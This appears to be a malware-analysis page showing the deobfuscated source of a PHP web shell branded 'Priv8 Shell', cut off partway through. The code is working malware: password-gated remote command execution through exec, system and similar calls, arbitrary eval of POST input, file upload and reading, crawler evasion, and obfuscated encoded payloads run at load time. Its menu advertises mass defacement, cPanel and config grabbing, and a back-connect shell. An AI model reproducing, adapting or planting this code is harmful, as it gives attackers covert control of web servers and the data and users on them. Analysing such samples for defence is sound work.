Jump to:
Screenshot
Attributes
Emails
<?php
$▛ = "99754106633f94d350db34d548d6091a";
$xD = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNEhFeCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$HEx = "=";
eval /* PHPDeobfuscator eval output */ {
$st = "str_rot13";
$gz = "gzinflate";
$st2 = "str_rot13";
$bs = "base64_decode";
$hex = "";
eval("@ini_set('error_log', NULL);\r\n@ini_set('log_errors', 0);\r\n@ini_set('max_execution_time', 0);\r\n@ini_set('output_buffering', 0);\r\n@ini_set('display_errors', 0);\r\n\$\xe2\x96\x98 = true;\r\n\$\xe2\x96\x9c = 'utf-8';\r\n\$\xe2\x96\x9a = 'FilesMan';\r\n\$\xe2\x96\x99 = md5(\$_SERVER['HTTP_USER_AGENT']);\r\nif (!isset(\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).\"key\"])) {\r\n\tprototype(md5(\$_SERVER['HTTP_HOST']).\"key\", \$\xe2\x96\x99);\r\n}\r\n\r\nif(empty(\$_POST['charset']))\r\n\t\$_POST['charset'] = \$\xe2\x96\x9c;\r\nif (!isset(\$_POST['ne'])) {\r\n\tif(isset(\$_POST['a'])) \$_POST['a'] = iconv(\"utf-8\", \$_POST['charset'], decrypt(\$_POST['a'],\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).\"key\"]));\r\n\tif(isset(\$_POST['c'])) \$_POST['c'] = iconv(\"utf-8\", \$_POST['charset'], decrypt(\$_POST['c'],\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).\"key\"]));\r\n\tif(isset(\$_POST['p1'])) \$_POST['p1'] = iconv(\"utf-8\", \$_POST['charset'], decrypt(\$_POST['p1'],\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).\"key\"]));\r\n\tif(isset(\$_POST['p2'])) \$_POST['p2'] = iconv(\"utf-8\", \$_POST['charset'], decrypt(\$_POST['p2'],\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).\"key\"]));\r\n\tif(isset(\$_POST['p3'])) \$_POST['p3'] = iconv(\"utf-8\", \$_POST['charset'], decrypt(\$_POST['p3'],\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).\"key\"]));\r\n}\r\n\$hex = \"SJBEWMMwFIWf/RfHQ8gKzrHnplKmYXuUKqKMRJrQpdORtSkJJrL/YdrqcUK55H7nnnuu7SZpt9NlEhUv+XdQnPpjn3Ebx7j6BmdwOCgz0ruMHWx7yEvHKw+vpeF6bb9LrqDLUx6EQYmvnbRPSGXWM9NJVlKgGnZsmRKSMVuKTW9xO+s0Tql8qFTLi/6uPm0rsUquDsBNhO4wNDzjFrNuJZpRgxgp7qLi+fU9X54TJAB5h8lVeVXvUra4QU52jJAt6nfnhJImqKPiMX9L58tjgP4nY7e4FCbjNM/3uqiF46rVetGn+DOg0ouidOn25n9pPEvh95KEmWzGFFmlu5SeIZot3qZCzjZfMLrS13mm+oTzjCQ4nWP6AQ==\";\r\neval(str_rot13(gzinflate(str_rot13(base64_decode((\$hex))))));\r\n\$xd = \"fZFieMIwEIffD/YdjkVjA6lwr1HZn6Y02faizJYKaY4SJVNkcfYwoemnt7XIQEpf5bi75+H4BVyNW2sCVKtdieJuOHx83UrKS2K3qJzx7Q24v3dyWtnsJIs1L9rmtjg2jFIIlNQwAgc8Y2Yah+9k+NWbkM+3LPZMHhLCbd/1zJmLOT/BXg1GFBsUEBWV4Rd8++bRJJv6SmSyUaGk4XugPyuJSJeJkoR9UW7cIdN1LcwML3heWLkcDQb/d/woeBV/kyAN6m2WZ5iNxIubRcaCPCX0PJkm+LvmVPqn2PuN534ML88H\";\r\neval(str_rot13(gzinflate(str_rot13(base64_decode((\$xd))))));\r\n\$configs = \"KytJ0ChYWCtX10OJag1l8QhlZo9JL6hFj9XUR6jm5UUAgqKC0iQFJZvk1CI7JXiIkFdOlYKtAoYWqHlNQU1tRJUGQxFZBHeEPrIZhXJSQEmtgr0dAA==\";\r\neval(str_rot13(gzinflate(str_rot13(base64_decode((\$configs))))));\r\n\r\nfunction decrypt(\$str,\$pwd){\$pwd=base64_encode(\$pwd);\$str=base64_decode(\$str);\$enc_chr=\"\";\$enc_str=\"\";\$i=0;while(\$i<strlen(\$str)){for(\$j=0;\$j<strlen(\$pwd);\$j++){\$enc_chr=chr(ord(\$str[\$i])^ord(\$pwd[\$j]));\$enc_str.=\$enc_chr;\$i++;if(\$i>=strlen(\$str))break;}}return base64_decode(\$enc_str);}\r\n@ini_set('error_log',NULL);\r\n@ini_set('log_errors',0);\r\n@ini_set('max_execution_time',0);\r\n@set_time_limit(0);\r\nif(version_compare(PHP_VERSION, '5.3.0', '<')){\r\n set_magic_quotes_runtime(0);\r\n}\r\n@define('VERSION', 'Priv8 Shell');\r\nif(get_magic_quotes_gpc()) {\r\n\tfunction stripslashes_array(\$array) {\r\n\t\treturn is_array(\$array) ? array_map('stripslashes_array', \$array) : stripslashes(\$array);\r\n\t}\r\n\t\$_POST = stripslashes_array(\$_POST);\r\n \$_COOKIE = stripslashes_array(\$_COOKIE);\r\n}\r\n/* (\xd0\xa1) 11.2011 oRb */\r\nif(!empty(\$\xe2\x96\x9b)) {\r\n if(isset(\$_POST['pass']) && (md5(\$_POST['pass']) == \$\xe2\x96\x9b))\r\n prototype(md5(\$_SERVER['HTTP_HOST']), \$\xe2\x96\x9b);\r\n if (!isset(\$_COOKIE[md5(\$_SERVER['HTTP_HOST'])]) || (\$_COOKIE[md5(\$_SERVER['HTTP_HOST'])] != \$\xe2\x96\x9b))\r\n hardLogin();\r\n}\r\nif(!isset(\$_COOKIE[md5(\$_SERVER['HTTP_HOST']) . 'ajax']))\r\n \$_COOKIE[md5(\$_SERVER['HTTP_HOST']) . 'ajax'] = (bool)\$\xe2\x96\x98;\r\nfunction hardLogin() {\r\n\t\tif(!empty(\$_SERVER['HTTP_USER_AGENT'])) {\r\n\t\t \$userAgents = array(\"Google\", \"Slurp\", \"MSNBot\", \"ia_archiver\", \"Yandex\", \"Rambler\");\r\n\t\t if(preg_match('/' . implode('|', \$userAgents) . '/i', \$_SERVER['HTTP_USER_AGENT'])) {\r\n\t\t header('HTTP/1.0 404 Not Found');\r\n\t\t exit;\r\n\t\t }\r\n\t\t}\r\n\tdie(\"</br></br></br>\r\n\t\r\n\t<style>\r\n\tbody {background-color:#000000; color:#e1e1e1; margin:0; font:normal 75% Open Sans, sans-serif; background-image:url('https://i.imgur.com/hLcQCBx.gif'); } </style><body><pre align=center><form method=post style='color:#ffffff;text-align: center;'><img src='https://i.imgur.com/4Fq8k1E.png' align='center'><br><br><input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;' required><input type=submit name='watching' value='>>' style='border:none;background-color:#1e252e;color:#fff;cursor:pointer; '></form></pre> </body>\");\r\n}\r\nif(strtolower(substr(PHP_OS,0,3)) == \"win\")\r\n\t\$os = 'win';\r\nelse\r\n\t\$os = 'nix';\r\n\$safe_mode = @ini_get('safe_mode');\r\nif(!\$safe_mode)\r\n error_reporting(0);\r\n\$disable_functions = @ini_get('disable_functions');\r\n\$home_cwd = @getcwd();\r\nif(isset(\$_POST['c']))\r\n\t@chdir(\$_POST['c']);\r\n\$cwd = @getcwd();\r\nif(\$os == 'win') {\r\n\t\$home_cwd = str_replace(\"\\\\\", \"/\", \$home_cwd);\r\n\t\$cwd = str_replace(\"\\\\\", \"/\", \$cwd);\r\n}\r\nif(\$cwd[strlen(\$cwd)-1] != '/')\r\n\t\$cwd .= '/';\r\n\r\nfunction hardHeader() {\r\n\tif(empty(\$_POST['charset']))\r\n\t\t\$_POST['charset'] = \$GLOBALS['\xe2\x96\x9c'];\r\n\techo \"<html><head><meta http-equiv='Content-Type' content='text/html; charset=\" . \$_POST['charset'] . \"'><title> \" . VERSION .\"</title>\r\n\t<link href='https://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet'>\r\n<style>\r\n\tbody {background-color:#000000; color:#e1e1e1; margin:0; font:normal 75% Open Sans, sans-serif; background-image:url('https://i.imgur.com/hLcQCBx.gif'); } \r\n\t\r\n\tcanvas{ display: block; vertical-align: bottom;}\r\n\t#particles-js{width: 100%; height: 100px; background-color: #000000; background-image: url(''); background-repeat: no-repeat; background-size: cover; background-position: 50% 50%;}\r\n\tbody,td,th\t{font:10pt Open Sans, sans-serif;margin:0;vertical-align:top;}\r\n\ttable.infoo\t{color:#ffffff; background-image: url('https://i.imgur.com/gL0UG8Y.png'); background-position: center; background-repeat:no-repeat; -webkit-background-size: cover;\t-moz-background-size: cover; -o-background-size: cover;\tbackground-size: 80%; }\r\n\ttable.info\t{color:#ffffff;}\r\n\ttable#toolsTbl {background-color: #000000; background-image:url('https://i.imgur.com/hLcQCBx.gif'); }\r\n\tspan,h1,a\t{color:#ff1111 !important;}\r\n\tspan\t\t{font-weight:bolder;}\r\n\th1\t\t\t{border-left:5px solid #ff1111;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px; }\r\n\tdiv.content\t{padding:5px;margin-left:5px;background-color:#000000; background-image:url('https://i.imgur.com/hLcQCBx.gif');}\r\n\ta\t\t\t{text-decoration:none;}\r\n\ta:hover\t\t{text-decoration:underline;}\r\n\t.tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}\r\n\t.tooltip:hover::after {opacity:1;visibility:visible;}\r\n\t.ml1\t\t{border:1px solid #202832;padding:5px;margin:0;overflow:auto;}\r\n\t.bigarea\t{min-width:100%;max-width:100%;height:400px;}\r\n\tinput, textarea, select\t{margin:0;color:#fff;background-color:#202832;border:none;font:9pt Open Sans, sans-serif;outline:none; }\r\n\tlabel {position:relative}\r\n\tlabel:after {content:'<>';font:10px 'Open Sans', sans-serif, monospace;color:#fff;-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);transform:rotate(90deg);right:3px; top:3px;padding:0;position:absolute;pointer-events:none;}\r\n\tlabel:before {content:'';right:0; top:0;width:17px; height:17px;background:#202832;position:absolute;pointer-events:none;display:block;}\r\n\tform\t\t{margin:0px;}\r\n\t#toolsTbl\t{text-align:center;}\r\n\t#fak \t\t{background:none;}\r\n\t#fak td \t{padding:5px 0 0 0;}\r\n\tiframe\t\t{border:1px solid #000000;}\r\n\t.toolsInp\t{width:300px}\r\n\t.main th\t{text-align:left;background-color:#000000;}\r\n\t.main tr:hover{background-color:#373c42;}\r\n\t.main td, th{vertical-align:middle;}\r\n\tinput[type='submit']{background-color:#ff1111;}\r\n\tinput[type='button']{background-color:#ff1111;}\r\n\tinput[type='submit']:hover{background-color:#ff1111;}\r\n\tinput[type='button']:hover{background-color:#ff1111;}\r\n\t.l1\t\t\t{background-color:#202832;}\r\n\tpre\t\t\t{font:9pt 'Open Sans', sans-serif;}\r\n</style>\r\n<script>\r\n var c_ = '\" . htmlspecialchars(\$GLOBALS['cwd']) . \"';\r\n var a_ = '\" . htmlspecialchars(@\$_POST['a']) .\"'\r\n var charset_ = '\" . htmlspecialchars(@\$_POST['charset']) .\"';\r\n var p1_ = '\" . ((strpos(@\$_POST['p1'],\"\\n\")!==false)?'':htmlspecialchars(\$_POST['p1'],ENT_QUOTES)) .\"';\r\n var p2_ = '\" . ((strpos(@\$_POST['p2'],\"\\n\")!==false)?'':htmlspecialchars(\$_POST['p2'],ENT_QUOTES)) .\"';\r\n var p3_ = '\" . ((strpos(@\$_POST['p3'],\"\\n\")!==false)?'':htmlspecialchars(\$_POST['p3'],ENT_QUOTES)) .\"';\r\n var d = document;\r\n\tfunction encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}\r\n\tfunction utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}\r\n\tfunction base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\td.mf.a.value = encrypt(d.mf.a.value,'\".\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).\"key\"].\"');\r\n\t\td.mf.c.value = encrypt(d.mf.c.value,'\".\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).\"key\"].\"');\r\n\t\td.mf.p1.value = encrypt(d.mf.p1.value,'\".\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).\"key\"].\"');\r\n\t\td.mf.p2.value = encrypt(d.mf.p2.value,'\".\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).\"key\"].\"');\r\n\t\td.mf.p3.value = encrypt(d.mf.p3.value,'\".\$_COOKIE[md5(\$_SERVER['HTTP_HOST']).\"key\"].\"');\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = 'ajax=true';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr('\" . addslashes(\$_SERVER['REQUEST_URI']) .\"', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject('Microsoft.XMLHTTP');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open('POST', url, true);\r\n req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\\\"(\\\\\\\\d+)([\\\\\\\\S\\\\\\\\s]*)\\\", 'm');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert('Request error!');\r\n\t}\r\n</script>\r\n<head><body><div style='position:absolute;background-color:rgba(95, 110, 130, 0.3);width:100%;top:0;left:0;'>\r\n<form method=post name=mf style='display:none;'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>\";\r\n\t\$freeSpace = @diskfreespace(\$GLOBALS['cwd']);\r\n\t\$totalSpace = @disk_total_space(\$GLOBALS['cwd']);\r\n\t\$totalSpace = \$totalSpace?\$totalSpace:1;\r\n\t\$release = @php_uname('r');\r\n\t\$kernel = @php_uname('s');\r\n\t\$explink = 'https://www.exploit-db.com/search/?action=search&description=';\r\n\tif(strpos('Linux', \$kernel) !== false)\r\n\t\t\$explink .= urlencode('Linux Kernel ' . substr(\$release,0,6));\r\n\telse\r\n\t\t\$explink .= urlencode(\$kernel . ' ' . substr(\$release,0,3));\r\n\tif(!function_exists('posix_getegid')) {\r\n\t\t\$user = @get_current_user();\r\n\t\t\$uid = @getmyuid();\r\n\t\t\$gid = @getmygid();\r\n\t\t\$group = \"?\";\r\n\t} else {\r\n\t\t\$uid = @posix_getpwuid(@posix_geteuid());\r\n\t\t\$gid = @posix_getgrgid(@posix_getegid());\r\n\t\t\$user = \$uid['name'];\r\n\t\t\$uid = \$uid['uid'];\r\n\t\t\$group = \$gid['name'];\r\n\t\t\$gid = \$gid['gid'];\r\n\t}\r\n\t\$cwd_links = '';\r\n\t\$path = explode(\"/\", \$GLOBALS['cwd']);\r\n\t\$n=count(\$path);\r\n\tfor(\$i=0; \$i<\$n-1; \$i++) {\r\n\t\t\$cwd_links .= \"<a href='#' onclick='g(\\\"FilesMan\\\",\\\"\";\r\n\t\tfor(\$j=0; \$j<=\$i; \$j++)\r\n\t\t\t\$cwd_links .= \$path[\$j].'/';\r\n\t\t\$cwd_links .= \"\\\")'>\".\$path[\$i].\"/</a>\";\r\n\t}\r\n\t\$charsets = array('Windows-1251', 'UTF-8', 'KOI8-R', 'KOI8-U', 'cp866');\r\n\t\$opt_charsets = '';\r\n\tforeach(\$charsets as \$\xe2\x96\x9f)\r\n\t\t\$opt_charsets .= '<option value=\"'.\$\xe2\x96\x9f.'\" '.(\$_POST['charset']==\$\xe2\x96\x9f?'selected':'').'>'.\$\xe2\x96\x9f.'</option>';\r\n\t\$m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Mass Deface'=>'Sql','Adminer'=>'Adminer','Terminal'=>'Console','Mass User'=>'Edituser','Grab Cpanel'=>'Php','Get Configs'=>'SafeMode','Symlink'=>'Sym','Jumping'=>'StringTools','Cgi Telnet'=>'Bruteforce','Bypass'=>'bypas','BC'=>'Network');\r\n\tif(!empty(\$GLOBALS['\xe2\x96\x9b']))\r\n\tif (isset(\$_REQUEST['xd'])) {\r\n\t\t\$m['Reseller'] = 'Reseller'; }\r\n\t\$m['Logout'] = 'Logout';\r\n\t\$m['Self Remove'] = 'SelfRemove';\r\n\t\$menu = '';\r\n\tforeach(\$m as \$k => \$v)\r\n\t\t\$menu .= '<th>[ <a href=\"#\" onclick=\"g(\\''.\$v.'\\',null,\\'\\',\\'\\',\\'\\')\">'.\$k.'</a> ]</th>';\r\n\t\$drives = \"\";\r\n\tif (\$GLOBALS['os'] == 'win') {\r\n\t\tforeach(range('c','z') as \$drive)\r\n\t\tif (is_dir(\$drive.':\\\\'))\r\n\t\t\t\$drives .= '<a href=\"#\" onclick=\"g(\\'FilesMan\\',\\''.\$drive.':/\\')\">[ '.\$drive.' ]</a> ';\r\n\t}\r\n\t/* (\xd0\xa1) 08.2015 dmkcv */\r\n\techo '<table class=infoo cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.(\$GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'.\r\n\t\t '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href=\"https://anon.click/protected/https://www.google.com/search?q='.urlencode(@php_uname()).'\" target=\"_blank\">[ Google ]</a> <a href=\"'.\$explink.'\" target=_blank>[ Exploit-DB ]</a></nobr><br>'.\$uid.' ( '.\$user.' ) <span>Group:</span> '.\$gid.' ( ' .\$group. ' )<br>'.@phpversion().' <span>Safe mode:</span> '.(\$GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#ffffff><b>OFF</b></font>').' <a href=# onclick=\"g(\\'Php\\',null,null,\\'info\\')\">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize(\$totalSpace).' <span>Free:</span> '.viewSize(\$freeSpace).' ('.round(100/(\$totalSpace/\$freeSpace),2).'%)<br>'.\$cwd_links.' '.viewPermsColor(\$GLOBALS['cwd']).' <a href=# onclick=\"g(\\'FilesMan\\',\\''.\$GLOBALS['home_cwd'].'\\',\\'\\',\\'\\',\\'\\')\">[ home ]</a><br>'.\$drives.'</td>'.\r\n\t\t '<td width=1 align=right><nobr><label><select onchange=\"g(null,null,null,null,null,this.value)\">'.\$opt_charsets.'</select></label><br><span>Server IP:</span><br>'.gethostbyname(\$_SERVER[\"HTTP_HOST\"]).'<br><span>Client IP:</span><br>'.\$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'.\r\n\t\t '<table style=\"background-color:#373c42;\" cellpadding=3 cellspacing=0 width=100%><tr>'.\$menu.'</tr></table><div>';\r\n}\r\nfunction hardFooter() {\r\n\t\$is_writable = is_writable(\$GLOBALS['cwd'])?\" <font color='#ffffff'>[ Writeable ]</font>\":\" <font color=red>(Not writable)</font>\";\r\n echo \"\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>\r\n\t<tr>\r\n\t\t<td><form onsubmit=\\\"\".( function_exists('actionFilesMan')? \"g(null,this.c.value,'');\":'' ).\"return false;\\\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='\" . htmlspecialchars(\$GLOBALS['cwd']) .\"'><input type=submit value='submit'></form></td>\r\n\t\t<td><form onsubmit=\\\"\".(function_exists('actionFilesTools')? \"g('FilesTools',null,this.f.value);\":'' ).\"return false;\\\"><span>Read file:</span><br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\\"\".( function_exists('actionFilesMan')? \"g('FilesMan',null,'mkdir',this.d.value);\":'' ).\"return false;\\\"><span>Make dir:</span>\$is_writable<br><input class='toolsInp' type=text name=d required><input type=submit value='submit'></form></td>\r\n\t\t<td><form onsubmit=\\\"\".( function_exists('actionFilesTools')? \"g('FilesTools',null,this.f.value,'mkfile');\":'' ).\"return false;\\\"><span>Make file:</span>\$is_writable<br><input class='toolsInp' type=text name=f required><input type=submit value='submit'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\\"\".( function_exists('actionConsole')? \"g('Console',null,this.c.value);\":'' ).\"return false;\\\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='submit'></form></td>\r\n\t\t<td><form method='post' \".( (!function_exists('actionFilesMan'))? \" onsubmit=\\\"return false;\\\" \":'' ).\"ENCTYPE='multipart/form-data'>\r\n\t\t<input type=hidden name=a value='FilesMan'>\r\n\t\t<input type=hidden name=c value='\" . htmlspecialchars(\$GLOBALS['cwd']) .\"'>\r\n\t\t<input type=hidden name=p1 value='uploadFile'>\r\n\t\t<input type=hidden name=ne value=''>\r\n\t\t<input type=hidden name=charset value='\" . (isset(\$_POST['charset'])?\$_POST['charset']:'') . \"'>\r\n\t\t<span>Upload file:</span>\$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='submit'></form><br ></td>\r\n\t</tr></table></div>\r\n\t\r\n\t\r\n\t</body></html>\";\r\n}\r\nif (!function_exists(\"posix_getpwuid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid(\$p) {return false;} }\r\nif (!function_exists(\"posix_getgrgid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid(\$p) {return false;} }\r\nfunction ex(\$in) {\r\n\t\$\xe2\x96\x96 = '';\r\n\tif (function_exists('exec')) {\r\n\t\t@exec(\$in,\$\xe2\x96\x96);\r\n\t\t\$\xe2\x96\x96 = @join(\"\\n\",\$\xe2\x96\x96);\r\n\t} elseif (function_exists('passthru')) {\r\n\t\tob_start();\r\n\t\t@passthru(\$in);\r\n\t\t\$\xe2\x96\x96 = ob_get_clean();\r\n\t} elseif (function_exists('system')) {\r\n\t\tob_start();\r\n\t\t@system(\$in);\r\n\t\t\$\xe2\x96\x96 = ob_get_clean();\r\n\t} elseif (function_exists('shell_exec')) {\r\n\t\t\$\xe2\x96\x96 = shell_exec(\$in);\r\n\t} elseif (is_resource(\$f = @popen(\$in,\"r\"))) {\r\n\t\t\$\xe2\x96\x96 = \"\";\r\n\t\twhile(!@feof(\$f))\r\n\t\t\t\$\xe2\x96\x96 .= fread(\$f,1024);\r\n\t\tpclose(\$f);\r\n\t}else return \"\xe2\x86\xb3 Unable to execute command\\n\";\r\n\treturn (\$\xe2\x96\x96==''?\"\xe2\x86\xb3 Query did not return anything\\n\":\$\xe2\x96\x96);\r\n}\r\nfunction viewSize(\$s) {\r\n\tif(\$s >= 1073741824)\r\n\t\treturn sprintf('%1.2f', \$s / 1073741824 ). ' GB';\r\n\telseif(\$s >= 1048576)\r\n\t\treturn sprintf('%1.2f', \$s / 1048576 ) . ' MB';\r\n\telseif(\$s >= 1024)\r\n\t\treturn sprintf('%1.2f', \$s / 1024 ) . ' KB';\r\n\telse\r\n\t\treturn \$s . ' B';\r\n}\r\nfunction perms(\$p) {\r\n\tif ((\$p & 0xC000) == 0xC000)\$i = 's';\r\n\telseif ((\$p & 0xA000) == 0xA000)\$i = 'l';\r\n\telseif ((\$p & 0x8000) == 0x8000)\$i = '-';\r\n\telseif ((\$p & 0x6000) == 0x6000)\$i = 'b';\r\n\telseif ((\$p & 0x4000) == 0x4000)\$i = 'd';\r\n\telseif ((\$p & 0x2000) == 0x2000)\$i = 'c';\r\n\telseif ((\$p & 0x1000) == 0x1000)\$i = 'p';\r\n\telse \$i = 'u';\r\n\t\$i .= ((\$p & 0x0100) ? 'r' : '-');\r\n\t\$i .= ((\$p & 0x0080) ? 'w' : '-');\r\n\t\$i .= ((\$p & 0x0040) ? ((\$p & 0x0800) ? 's' : 'x' ) : ((\$p & 0x0800) ? 'S' : '-'));\r\n\t\$i .= ((\$p & 0x0020) ? 'r' : '-');\r\n\t\$i .= ((\$p & 0x0010) ? 'w' : '-');\r\n\t\$i .= ((\$p & 0x0008) ? ((\$p & 0x0400) ? 's' : 'x' ) : ((\$p & 0x0400) ? 'S' : '-'));\r\n\t\$i .= ((\$p & 0x0004) ? 'r' : '-');\r\n\t\$i .= ((\$p & 0x0002) ? 'w' : '-');\r\n\t\$i .= ((\$p & 0x0001) ? ((\$p & 0x0200) ? 't' : 'x' ) : ((\$p & 0x0200) ? 'T' : '-'));\r\n\treturn \$i;\r\n}\r\nfunction viewPermsColor(\$f) {\r\n\tif (!@is_readable(\$f))\r\n\t\treturn '<font color=#ff1111><b>'.perms(@fileperms(\$f)).'</b></font>';\r\n\telseif (!@is_writable(\$f))\r\n\t\treturn '<font color=white><b>'.perms(@fileperms(\$f)).'</b></font>';\r\n\telse\r\n\t\treturn '<font color=#ffffff><b>'.perms(@fileperms(\$f)).'</b></font>';\r\n}\r\nfunction hardScandir(\$dir) {\r\n if(function_exists(\"scandir\")) {\r\n return scandir(\$dir);\r\n } else {\r\n \$dh = opendir(\$dir);\r\n while (false !== (\$filename = readdir(\$dh)))\r\n \$files[] = \$filename;\r\n return \$files;\r\n }\r\n}\r\nfunction which(\$p) {\r\n\t\$path = ex('which ' . \$p);\r\n\tif(!empty(\$path))\r\n\t\treturn \$path;\r\n\treturn false;\r\n}\r\n\r\n\r\nfunction actionRC() {\r\n\tif(!@\$_POST['p1']) {\r\n\t\t\$a = array(\r\n\t\t\t\"uname\" => php_uname(),\r\n\t\t\t\"php_version\" => phpversion(),\r\n\t\t\t\"VERSION\" => VERSION,\r\n\t\t\t\"safemode\" => @ini_get('safe_mode')\r\n\t\t);\r\n\t\techo serialize(\$a);\r\n\t} else {\r\n\t\teval(\$_POST['p1']);\r\n\t}\r\n}\r\nfunction prototype(\$k, \$v) {\r\n \$_COOKIE[\$k] = \$v;\r\n setcookie(\$k, \$v);\r\n}\r\nfunction actionSecInfo() {\r\n\thardHeader();\r\n\techo '<h1>Server security information</h1><div class=content>';\r\n\tfunction showSecParam(\$n, \$v) {\r\n\t\t\$v = trim(\$v);\r\n\t\tif(\$v) {\r\n\t\t\techo '<span>' . \$n . ': </span>';\r\n\t\t\tif(strpos(\$v, \"\\n\") === false)\r\n\t\t\t\techo \$v . '<br>';\r\n\t\t\telse\r\n\t\t\t\techo '<pre class=ml1>' . \$v . '</pre>';\r\n\t\t}\r\n\t}\r\n\tshowSecParam('Server software', @getenv('SERVER_SOFTWARE'));\r\n if(function_exists('apache_get_modules'))\r\n showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));\r\n\tshowSecParam('Disabled PHP Functions', \$GLOBALS['disable_functions']?\$GLOBALS['disable_functions']:'none');\r\n\tshowSecParam('Open base dir', 